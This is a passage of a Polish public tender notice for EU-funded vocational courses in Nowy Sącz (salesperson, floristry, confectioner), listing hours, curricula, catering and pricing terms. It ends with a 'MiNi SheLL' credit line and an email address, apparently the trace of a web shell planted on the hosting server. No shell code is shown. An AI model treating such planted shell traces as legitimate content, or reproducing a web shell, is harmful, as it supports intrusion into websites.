- warunki pracy zgodnie z przepisami bezpieczeństwa i higieny pracy w trakcie  szkolenia;
- niezbędne materiały szkoleniowe, które zostaną ujęte w koszcie szkolenia i po jego zakończeniu przejdą w posiadanie uczestników w/w szkolenia(np. książkę, podręcznik związany z tematyką zajęć)
- niezbędne badania lekarskie, których koszt zostanie wliczony w ogólny koszt szkolenia.
- przerw kawowych w postaci poczęstunku każdego dnia kursu w którym osoba uczestniczy.
Zamawiający rozumie pod postacią poczęstunku kawa /mielona typu Prima, rozpuszczalna typu   Nescafe Classic /, herbata /typu Lipton/, cukier, śmietanka, ciastka/ typu różne w ilości 0,5    kg/dziennie/ zimne napoje/ typu piwniczanka w butelkach 0,5l, w ilości 5 butelek każdego dnia zajęć, koszt poczęstunku pokrywa wykonawca i wlicza go do kosztu szkolenia
11. Zamawiający wymaga:
   - ubezpieczenia wszystkich uczestników szkolenia w czasie jego trwania w ramach polisy NNW.  Koszt  ubezpieczenia należy ująć w  koszt ogólny szkolenia 
    - aby szkolenie prowadził/li wykładowcy posiadający wykształcenie uprawniające do prowadzenia tego rodzaju kursu.
12. Wykonawca zobowiązuje się do prowadzenia szkolenia zgodnie z przedstawionym Zamawiającemu programem i harmonogramem szkolenia oraz warunkami podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego dorosłych - z rozporządzenie MEN z dnia 11.01.2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U.Poz. 186).
13. Szkolenie winno zakończyć się egzaminem wewnętrznym oraz wydaniem:
 - zaświadczenia o jego ukończeniu zgodnie z rozporządzeniem MEN z dnia 11.01.2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. Poz. 186) - certyfikatu z logo Unii Europejskiej i Europejskiego Funduszu Społecznego oraz logo Programu Operacyjnego Kapitał Ludzki potwierdzającego ukończenie szkolenia.
14. Oferta winna obejmować koszty przeprowadzenia zajęć teoretycznych  i praktycznych przez wykładowców i instruktorów zgodnie z wymaganiami Zamawiającego, koszty niezbędnych materiałów dydaktycznych i sprzętu dla wszystkich kursantów, koszty badań lekarskich, oraz koszty ubezpieczenia NNW wszystkich kursantów na czas uczestnictwa w kursie, koszt poczęstunku, a także koszt egzaminu wewnętrznego (jeżeli będzie odpłatny) Oferta powinna zawierać cenę brutto na 1 osobę  i godzinę / ryczałt/ oraz  łączną kwotę za całość szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs Sprzedawcy z obsługą kasą fiskalną, terminali płatniczych, komputera oraz  fakturowaniem komputerowym: dla 3 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Celem szkolenia jest  nabycie przez kursanta wiedzy i umiejętności praktycznych niezbędnych do podjęcia pracy jako sprzedawca. 
2. Zamawiający skieruje 3 uczestników projektu na kurs Sprzedawcy z obsługą kasą fiskalną, terminali płatniczych, komputera oraz fakturowaniem komputerowym 
3. Liczba godzin ogółem: 70 godzin zegarowych teoretyczno-zawodowych i praktycznych dla każdego uczestnika zawierających:
Moduł I zajęcia teoretyczno - zawodowe
- 50 godz. zajęć z zakresu Sprzedawca z obsługą komputera i fakturowaniem komputerowym 
Moduł II zajęcia praktyczne
- 20 godzin zajęć z obsługi kasy fiskalnej
4. Planowany termin rozpoczęcia szkolenia: od dnia podpisania umowy do 30.09.2013r.
5. Minimalna treść nauczania:
Moduł I teoretyczno-zawodowy obejmujący 50 godzin zegarowych: podstawowe zadania i obowiązki sprzedawcy ,prezentacja produktu i techniki sprzedaży, podstawy towaroznawstwa handlowego, dokumentacja handlowa, organizacja czasu pracy,  podstawowe zasady wystawiania faktury elementy i rodzaje faktur
Moduł II - praktyczny - obejmujący 20 godzin zegarowych zajęć praktycznych:
budowa i zasady działania kasy fiskalnej sprzedaż i wykonywanie raportów na kasie fiskalnej praktyczna obsługa kasy fiskalnej
 6. Wymaga się aby zajęcia szkoleniowe odbywały się wyłącznie w dni robocze (poniedziałek -piątek).
7. Miejsce odbywania szkolenia: miasto Nowy Sącz,
8. Zajęcia powinny zaczynać się nie wcześniej niż o godz. 8.00, kończyć nie później niż o godzinie 15.00
9. Liczba godzin zajęć powinna obejmować przeciętnie nie mniej niż 25 godzin zegarowych tygodniowo.
10. Wykonawca zapewni uczestnikom szkolenia:
- warunki pracy zgodnie z przepisami bezpieczeństwa i higieny pracy w trakcie
szkolenia,
- niezbędne materiały szkoleniowe, które zostaną ujęte w koszcie szkolenia i po jego zakończeniu przejdą w posiadanie uczestników w/w szkolenia( np książkę, podręcznik związany z tematyką zajęć)
- niezbędne badania lekarskie, których koszt zostanie wliczony w ogólny koszt
szkolenia,-przerw kawowych w postaci poczęstunku każdego dnia kursu w którym osoba uczestniczy. Zamawiający rozumie pod postacią poczęstunku kawa /mielona typu Prima, rozpuszczalna typu   Nescafe Classic /, herbata /typu Lipton/, cukier, śmietanka, ciastka/ typu różne w ilości 0,5 kg/dziennie/ zimne napoje/ typu piwniczanka w butelkach 0,5l, w ilości 3 butelek każdego dnia zajęć, koszt poczęstunku pokrywa wykonawca i wlicza go do kosztu szkolenia
11. Zamawiający wymaga:
   - ubezpieczenia wszystkich uczestników szkolenia w czasie jego trwania w ramach polisy   NNW.  Koszt  ubezpieczenia należy ująć w  koszt ogólny szkolenia 
 - aby szkolenie prowadził/li wykładowcy posiadający wykształcenie uprawniające do prowadzenia tego rodzaju kursu,
12. Wykonawca zobowiązuje się do prowadzenia szkolenia zgodnie z przedstawionym Zamawiającemu programem i harmonogramem szkolenia oraz warunkami podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego dorosłych - rozporządzenie MEN z dnia 11.01.2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. Poz.186).
13. Szkolenie winno zakończyć się egzaminem wewnętrznym oraz wydaniem:
     - zaświadczenia o jego ukończeniu zgodnie z rozporządzeniem MEN z dnia 11.01.2012 r.  w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. Poz. 186).- certyfikatu z logo Unii Europejskiej i Europejskiego Funduszu Społecznego oraz logo Programu Operacyjnego Kapitał Ludzki potwierdzającego ukończenie szkolenia.
14. Oferta winna obejmować koszty przeprowadzenia zajęć teoretycznych  i praktycznych przez wykładowców i instruktorów zgodnie z wymaganiami Zamawiającego, koszty niezbędnych materiałów dydaktycznych i sprzętu dla wszystkich kursantów, koszty badań lekarskich, oraz koszty ubezpieczenia NNW wszystkich kursantów na czas uczestnictwa w kursie, koszt poczęstunku, a także koszt egzaminu wewnętrznego (jeżeli będzie odpłatny). Oferta powinna zawierać cenę brutto na 1 osobę  i godzinę / ryczałt/ oraz  łączną kwotę za całość szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs Bukieciarstwa i florystyki dla 2 osób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Celem szkolenia jest nabycie przez kursantów wiedzy i umiejętności praktycznych
niezbędnych do podjęcia pracy w zawodzie bukieciarza i florysty.
2. Zamawiający skieruje 2 uczestników projektu na kurs Bukieciarstwa i florystyki.
3. Liczba godzin ogółem: 90 godzin zegarowych teoretyczno-zawodowych i praktycznych dla każdego uczestnika zawierających:
Moduł I zajęcia teoretyczno - zawodowe
-30 godzin zajęć z zakresu bukieciarstwa i florystyki
Moduł II zajęcia praktyczne
- 60 godzin zajęć z zakresu bukieciarstwa i florystyki
4. Planowany termin rozpoczęcia szkolenia: od dnia 01.09.2013 r. do 30.09.2013r.
5. Minimalna treść nauczania:
Moduł I teoretyczno-zawodowy obejmujący 30 godzin zegarowych: organizacja stanowiska i miejsca pracy zgodnie z zasadami BHP, i p.poż., charakterystyka pracy bukieciarza i florysty, organizowanie zaopatrzenia w materiały wykorzystywane w kwiaciarni, wdrażanie  najnowszych trendów florystycznych, pozyskiwanie zleceń na wykonywanie zleceń bukieciarskich florystycznych,
 zasady doboru barw w tworzeniu kompozycji florystycznych, podział i przegląd roślin ozdobnych wykorzystywanych do dekoracji, układania wiązanek, rodzaje materiałów dekoratorskich wykorzystywane w bukieciarstwie, dekoratorstwie, pielęgnacja kwiatów ciętych i doniczkowych obsługa klienta z wykorzystaniem aktywnych metod sprzedaży, realizacja płatności gotówkowych i bezgotówkowych oraz reklamacje, marketing i reklama w handlu kwiatami, kultura osobista i etyka zawodowa na stanowisku bukieciarza i florysty, nawiązywanie i podtrzymywanie kontaktu z klientem,
Moduł II - praktyczny - obejmujący 60 godzin zegarowych zajęć praktycznych:  przygotowywanie materiałów roślinnych i nieroślinnych do ekspozycji oraz wykonywania różnego rodzaju wyrobów bukieciarskich, florystycznych i ich sprzedaży pielęgnowanie i ochrona roślin ozdobnych, kwiatów ciętych i doniczkowych  wykonywanie dekoracji komunijnych i ślubnych (wiązanki, bukiety, dekorowanie samochodów ślubnych, kościoła, sal weselnych), wykonywanie dekoracji świątecznych, florystyka żałobna, wykonywanie kompozycji z kwiatów i roślin suchych, wykonywanie kompozycji kwiatowych w naczyniach, wykonywanie stałej roślinnej dekoracji wnętrz, wykonywanie dekoracji wnętrz - stołów, wystaw, witryn sklepowych na różne okazje, uroczystości okolicznościowych,
 wykonywanie dekoracji przestrzennych wielkoformatowych,  przygotowywanie stanowiska pracy zgodnie z wymogami bezpieczeństwa i higieny  pracy, porządkowanie stanowiska pracy,
6. Wymaga się aby zajęcia szkoleniowe odbywały się wyłącznie w dni robocze (poniedziałek     -piątek).
7. Miejsce odbywania szkolenia: miasto Nowy Sącz,
8. Zajęcia powinny zaczynać się nie wcześniej niż o godz. 8.00, kończyć nie później niż o godzinie 15.00
9. Liczba godzin zajęć powinna obejmować przeciętnie nie mniej niż 25 godzin zegarowych tygodniowo.
10. Wykonawca zapewni uczestnikom szkolenia:
- odzież ochronną oraz niezbędne narzędzia pracy podczas odbywania zajęć
praktycznych;
- warunki pracy zgodnie z przepisami bezpieczeństwa i higieny pracy w trakcie
szkolenia,
- niezbędne materiały szkoleniowe, które zostaną ujęte w koszcie szkolenia i po jego zakończeniu przejdą w posiadanie uczestników w/w szkolenia( np książkę, podręcznik związany z tematyką zajęć)
- niezbędne badania lekarskie, których koszt zostanie wliczony w ogólny koszt
szkolenia,
- przerwy kawowe w postaci poczęstunku każdego dnia kursu w którym osoba        uczestniczy. Zamawiający rozumie pod postacią poczęstunku kawa /mielona typu Prima, rozpuszczalna typu   Nescafe Classic /, herbata /typu Lipton/, cukier, śmietanka, ciastka/ typu różne w ilości 0,5  kg/dziennie/ zimne napoje/ typu piwniczanka w butelkach 0,5l, w ilości 2 butelek każdego dnia zajęć, koszt poczęstunku pokrywa wykonawca i wlicza go do kosztu szkolenia
11. Zamawiający wymaga:
- ubezpieczenia wszystkich uczestników szkolenia w czasie jego trwania w   ramach polisy NNW.  Koszt  ubezpieczenia należy ująć w  koszt ogólny szkolenia 
 - aby szkolenie prowadził/li wykładowcy posiadający wykształcenie uprawniające do prowadzenia tego rodzaju kursu,
12.  Wykonawca zobowiązuje się do prowadzenia szkolenia zgodnie z przedstawionym Zamawiającemu programem i harmonogramem szkolenia oraz warunkami podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego dorosłych - rozporządzenie MEN z dnia 11.01.2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U.   Poz.186).
13. Szkolenie winno zakończyć się egzaminem wewnętrznym oraz wydaniem:
 - zaświadczenia o jego ukończeniu zgodnie z rozporządzeniem MEN z dnia 11.01.2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. Poz. 186). - certyfikatu z logo Unii Europejskiej i Europejskiego Funduszu Społecznego oraz logo Programu Operacyjnego Kapitał Ludzki potwierdzającego ukończenie szkolenia.
14. Oferta winna obejmować koszty przeprowadzenia zajęć teoretycznych  i praktycznych przez wykładowców i instruktorów zgodnie z wymaganiami Zamawiającego, koszty niezbędnych materiałów dydaktycznych i sprzętu dla wszystkich kursantów, koszty badań lekarskich, oraz koszty ubezpieczenia NNW wszystkich kursantów na czas uczestnictwa w kursie, koszt poczęstunku, a także koszt egzaminu wewnętrznego (jeżeli będzie odpłatny). Oferta powinna zawierać cenę brutto na 1 osobę  i godzinę / ryczałt/ oraz  łączną kwotę za całość szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs Cukiernika: dla 1 osoby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Celem szkolenia jest nabycie przez uczestnika wiedzy teoretycznej i praktycznej niezbędnej do wykonywania zawodu cukiernika. 2. Zamawiający skieruje 1 uczestnika projektu na kurs Cukiernika
3. Liczba godzin ogółem: 60 godzin zegarowych teoretyczno-zawodowych i praktycznych dla uczestnika: 4. Planowany termin rozpoczęcia szkolenia: od dnia 01.09.2013 r. do 30.09.2013r.
5. Minimalna treść nauczania:sporządzania ciast, kremów, mas i innych wyrobów ciastkarskich, dekoracja i wykańczania wyrobów ciastkarskich, przygotowanie deserów   cukierniczych  oraz lodów, zasady przechowywania, magazynowania i oceny surowców, przechowywanie i ekspozycja wyrobów cukierniczych, obsługa maszyn, urządzeń i sprzętu wykorzystywanego w pracy cukiernika, zasady organizacji i prowadzenia własnej cukierni.6. Wymaga się aby zajęcia szkoleniowe odbywały się wyłącznie w dni robocze (poniedziałek -piątek).7. Miejsce odbywania szkolenia: miasto Nowy Sącz. 8. Zajęcia powinny zaczynać się nie wcześniej niż o godz. 8.00, kończyć nie później niż o godzinie 15.00. 9. Liczba godzin zajęć powinna obejmować przeciętnie nie mniej niż 25 godzin zegarowych  tygodniowo.10. Wykonawca zapewni uczestnikowi szkolenia: salę do przeprowadzenia zajęć teoretycznych wyposażoną w urządzenia 
 i materiały niezbędne do przeprowadzenia tych zajęć
- pracownię do przeprowadzenia zajęć praktycznych wyposażoną w maszyny, urządzenia  oraz   materiały i surowce umożliwiające wykonywanie ćwiczeń przez uczestnika szkolenia 
   - zajęcia praktyczne muszą się odbywać pod nadzorem instruktora, który będzie oceniał   wykonywanie ćwiczeń przez uczestnika szkolenia oraz korygował ewentualne błędy.
- odzież ochronną oraz niezbędne narzędzia pracy podczas odbywania zajęć
praktycznych;
- warunki pracy zgodnie z przepisami bezpieczeństwa i higieny pracy w trakcie
szkolenia,
- niezbędne materiały szkoleniowe, które zostaną ujęte w koszcie szkolenia i po jego zakończeniu przejdą w posiadanie uczestnika w/w szkolenia( np. książkę, podręcznik związany z tematyką zajęć)
- niezbędne badania lekarskie, których koszt zostanie wliczony w ogólny koszt
szkolenia,
- przerw kawowych w postaci poczęstunku każdego dnia kursu w którym osoba     uczestniczy. Zamawiający rozumie pod postacią poczęstunku kawa /mielona typu Prima, rozpuszczalna typu   Nescafe Classic /, herbata /typu Lipton/, cukier, śmietanka, ciastka/ typu różne w ilości 0,5 kg/dziennie/ zimne napoje/ typu piwniczanka w butelkach 0,5l, w ilości 1 butelki każdego dnia zajęć, koszt poczęstunku pokrywa wykonawca i wlicza go do kosztu szkolenia
11. Zamawiający wymaga:
    - ubezpieczenia wszystkich uczestników szkolenia w czasie jego trwania w ramach polisy NNW.  Koszt  ubezpieczenia należy ująć w  koszt ogólny szkolenia 
-  aby szkolenie prowadził/li wykładowcy posiadający wykształcenie uprawniające do prowadzenia tego rodzaju kursu,
12. Wykonawca zobowiązuje się do prowadzenia szkolenia zgodnie z przedstawionym Zamawiającemu programem i harmonogramem szkolenia oraz warunkami podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego dorosłych - rozporządzenie MEN z dnia11.01.2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. Poz.186). Przy opracowywaniu programu szkolenia należy wykorzystać Standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych opracowane dla zawodu: cukiernik - kod zawodu 741201 dostępne w bazach danych Ministra Pracy i  Polityki Społecznej znajdujących się na stronie internetowej www.standardyiszkolenia.praca.gov.pl.
13. Szkolenie winno zakończyć się egzaminem wewnętrznym oraz wydaniem:
- zaświadczenia o jego ukończeniu zgodnie z rozporządzeniem MEN z dnia 11.01.2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. Poz. 186).- certyfikatu z logo Unii Europejskiej i Europejskiego Funduszu Społecznego oraz logo Programu Operacyjnego Kapitał Ludzki potwierdzającego ukończenie szkolenia. 14. Oferta winna obejmować koszty przeprowadzenia zajęć teoretycznych  i praktycznych przez wykładowców i instruktorów zgodnie z wymaganiami Zamawiającego, koszty niezbędnych materiałów dydaktycznych i sprzętu dla wszystkich kursantów, koszty badań lekarskich, oraz koszty ubezpieczenia NNW wszystkich kursantów na czas uczestnictwa w kursie, koszt poczęstunku, a także koszt egzaminu wewnętrznego (jeżeli będzie odpłatny). Oferta powinna zawierać cenę brutto na 1 osobę  i godzinę / ryczałt/ oraz  łączną kwotę za całość szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com